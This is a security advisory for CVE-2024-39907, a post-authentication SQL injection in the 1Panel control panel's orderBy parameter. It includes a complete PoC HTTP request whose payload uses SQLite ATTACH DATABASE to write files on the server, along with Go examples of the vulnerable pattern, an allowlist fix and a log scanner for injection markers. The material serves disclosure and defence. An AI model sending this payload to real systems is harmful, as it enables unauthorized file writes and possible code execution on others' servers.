1Panel Control Panel Post-Auth SQL Injection – CVE-2024-39907

Vulnerable Version

version 1.10.12-tls

Fixed Version

Update to the latest version.

Base Score

9.8 (Critical)

Vendor Description:-

1Panel is a modern, open-source Linux server management panel that makes it easier to deploy and administer applications, websites, and databases. It offers a simple web-based interface for controlling Docker containers, system resources, and security settings without requiring much command-line experience. 1Panel’s capabilities include one-click application installation, monitoring, and automated maintenance, with the goal of making server administration more efficient and user-friendly.

CVE-2024-39907 Description:-

CVE-2024-39907 is caused by unvalidated orderBy parameters in multiple DTOs being passed directly to GORM’s Order() method. Handlers and service functions take orderBy values from request DTOs and use them in fmt.Sprintf / GORM Order() calls without restricting the permissible values; the upstream patch added a single check on OrderBy fields, which indicates that those inputs had not been filtered before. Because user-controlled orderBy values are interpreted as column references, an attacker can manipulate the ORDER BY clause (for example, the leading 3 in the PoC’s orderBy value is treated as an unvalidated column reference), which exposes the underlying SQL injection vector and enables column-count / column-reference enumeration in vulnerable versions.
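The pattern the description sketches, shown as an added Go example (not 1Panel's own code): a DTO modelled on the JSON body in the PoC, the unsafe concatenation of the client's orderBy/order into the string that reaches GORM's Order(), and the allowlisted replacement that only ever uses the request value as a lookup key into server-side column names. The struct name, the sort keys and the column names are assumptions; the GORM call itself is left out so the example runs with the standard library alone.

```go
package main

import (
	"errors"
	"fmt"
)

// SearchWithPage is a hypothetical DTO modelled on the JSON body in the PoC;
// the real 1Panel struct name and tags are not shown on this page.
type SearchWithPage struct {
	Page     int    `json:"page"`
	PageSize int    `json:"pageSize"`
	GroupID  uint   `json:"groupID"`
	OrderBy  string `json:"orderBy"`
	Order    string `json:"order"`
	Name     string `json:"name"`
}

// vulnerableOrderClause reproduces the unsafe pattern the advisory describes:
// the client-supplied orderBy and order are formatted straight into the
// string that would be handed to db.Order(). Whatever the client sends is SQL.
func vulnerableOrderClause(d SearchWithPage) string {
	return fmt.Sprintf("%s %s", d.OrderBy, d.Order)
}

// allowedColumns maps the sort keys a client may ask for to real column names.
// Keys and columns are assumptions for this example, not 1Panel's schema.
var allowedColumns = map[string]string{
	"name":      "name",
	"createdAt": "created_at",
	"updatedAt": "updated_at",
}

// allowedOrders maps the two accepted direction words to SQL keywords.
var allowedOrders = map[string]string{
	"ascending":  "ASC",
	"descending": "DESC",
}

var (
	ErrBadOrderBy = errors.New("orderBy is not an allowed sort key")
	ErrBadOrder   = errors.New("order must be ascending or descending")
)

// safeOrderClause is the hardened form: the request values are used only as
// map keys, and the returned clause is assembled from server-side constants.
// The result is the string that would be passed to db.Order().
func safeOrderClause(d SearchWithPage) (string, error) {
	col, ok := allowedColumns[d.OrderBy]
	if !ok {
		return "", ErrBadOrderBy
	}
	dir, ok := allowedOrders[d.Order]
	if !ok {
		return "", ErrBadOrder
	}
	return col + " " + dir, nil
}

func main() {
	// Constructed request mirroring the PoC body (payload shortened).
	poc := SearchWithPage{Page: 1, PageSize: 10, OrderBy: "3;ATTACH DATABASE '/tmp/randstr.txt' AS test;", Order: "ascending", Name: "a"}
	fmt.Println("vulnerable clause:", vulnerableOrderClause(poc))
	if _, err := safeOrderClause(poc); err != nil {
		fmt.Println("hardened clause rejected:", err)
	}
	clause, _ := safeOrderClause(SearchWithPage{OrderBy: "createdAt", Order: "descending"})
	fmt.Println("hardened clause:", clause)
}
```

The key design choice is that the client never names a column at all: it picks from a fixed set of sort keys, and an unknown key is a 400-class error rather than something to sanitise. Escaping or quoting the value is not a substitute, because an ORDER BY target is an identifier, not a string literal, and cannot be bound as a parameter.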

Impact:-

  • Execute arbitrary SQL queries.
  • Extract sensitive information from the database.
  • Write arbitrary files to the server via SQLite features such as ATTACH DATABASE.
  • Ultimately achieve Remote Code Execution (RCE) under certain conditions.

Mitigation:-

  • Apply Updates Promptly – Regularly update 1Panel to the latest version to ensure security patches and bug fixes are applied.
  • Restrict Access – Limit panel access to trusted IP addresses or use a VPN to prevent exposure to the public internet.
  • Strong Authentication – Enforce strong, unique passwords and enable two-factor authentication (2FA) for all administrator accounts.
  • Least Privilege Principle – Assign minimal permissions to users and services, avoiding unnecessary root or admin-level access.

PoC

The vulnerability resides in the /api/v1/hosts/command/search endpoint, which is reachable after logging into the 1Panel control panel (the PoC was run with the default credentials). The orderBy parameter in the request body does not have adequate input validation, allowing SQL injection.

To exploit the vulnerability, send the crafted POST request shown below:

POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
  "page":1,
  "pageSize":10,
  "groupID":0,
  "orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
  "order":"ascending",
  "name":"a"
}

The malicious payload in the orderBy argument uses SQLite’s ATTACH DATABASE feature to create an arbitrary file on the server’s disk. When the request is processed, the 1Panel backend executes the injected SQL statements without validation, demonstrating that the vulnerability exists and can be exploited.
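For anyone who needs to know whether this endpoint was probed before the update was applied, an added Go example (not from the page or the project) that triages captured request bodies: it reads one JSON record per line, extracts orderBy from /api/v1/ requests and flags every value that is not a bare column identifier, separating statement syntax (the semicolons and ATTACH DATABASE the PoC relies on) from the bare column index the description mentions. The log format and the sample lines are constructed for the example.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
)

// logRecord is the assumed shape of one captured request: a JSON object per
// line carrying the path and the raw request body. Real proxy/WAF logs differ.
type logRecord struct {
	Path string `json:"path"`
	Body string `json:"body"`
}

// Finding is one flagged orderBy value together with the reason it was flagged.
type Finding struct {
	Path    string
	OrderBy string
	Reason  string
}

// identRe is the only shape a legitimate orderBy should have: a bare column name.
var identRe = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)

// sqlMarkers are fragments that never belong in a sort key. ATTACH and DATABASE
// are the SQLite features the PoC abuses; the rest are generic SQL control syntax.
var sqlMarkers = []string{";", "attach", "database", "create", "drop", "--", "/*"}

// classifyOrderBy returns "ok" for a bare identifier, "sql-syntax" when the
// value carries statement separators or DDL keywords, and "non-identifier"
// for anything else (for example a bare column index such as "3").
func classifyOrderBy(v string) string {
	if identRe.MatchString(v) {
		return "ok"
	}
	lower := strings.ToLower(v)
	for _, m := range sqlMarkers {
		if strings.Contains(lower, m) {
			return "sql-syntax"
		}
	}
	return "non-identifier"
}

// flagRecords walks newline-delimited log lines, parses the body of each
// /api/v1/ request, and returns every orderBy value that is not a bare identifier.
func flagRecords(lines string) []Finding {
	var hits []Finding
	for _, line := range strings.Split(lines, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		var rec logRecord
		if err := json.Unmarshal([]byte(line), &rec); err != nil {
			continue // unparseable line; a real pipeline would count these
		}
		if !strings.HasPrefix(rec.Path, "/api/v1/") {
			continue
		}
		var body struct {
			OrderBy string `json:"orderBy"`
		}
		if err := json.Unmarshal([]byte(rec.Body), &body); err != nil || body.OrderBy == "" {
			continue
		}
		if r := classifyOrderBy(body.OrderBy); r != "ok" {
			hits = append(hits, Finding{Path: rec.Path, OrderBy: body.OrderBy, Reason: r})
		}
	}
	return hits
}

// sampleLog is constructed for this example: two benign searches, one request
// carrying a shortened form of the PoC payload, one bare column index, and an
// unrelated endpoint with no orderBy at all.
const sampleLog = `{"path":"/api/v1/hosts/command/search","body":"{\"page\":1,\"orderBy\":\"name\",\"order\":\"ascending\"}"}
{"path":"/api/v1/hosts/command/search","body":"{\"page\":1,\"orderBy\":\"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;\",\"order\":\"ascending\"}"}
{"path":"/api/v1/hosts/command/search","body":"{\"page\":1,\"orderBy\":\"created_at\",\"order\":\"descending\"}"}
{"path":"/api/v1/hosts/command/search","body":"{\"page\":1,\"orderBy\":\"3\",\"order\":\"ascending\"}"}
{"path":"/api/v1/auth/login","body":"{\"name\":\"admin\"}"}`

func main() {
	for _, f := range flagRecords(sampleLog) {
		fmt.Printf("%s orderBy=%q reason=%s\n", f.Path, f.OrderBy, f.Reason)
	}
}
```

Because the advisory says the same unvalidated pattern appears in multiple DTOs, the scan deliberately covers every /api/v1/ path rather than only the search endpoint used in the PoC; a "non-identifier" hit on its own may be a client bug, but a "sql-syntax" hit against a version at or below 1.10.12-tls warrants checking the SQLite database and /tmp for files the server did not create.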

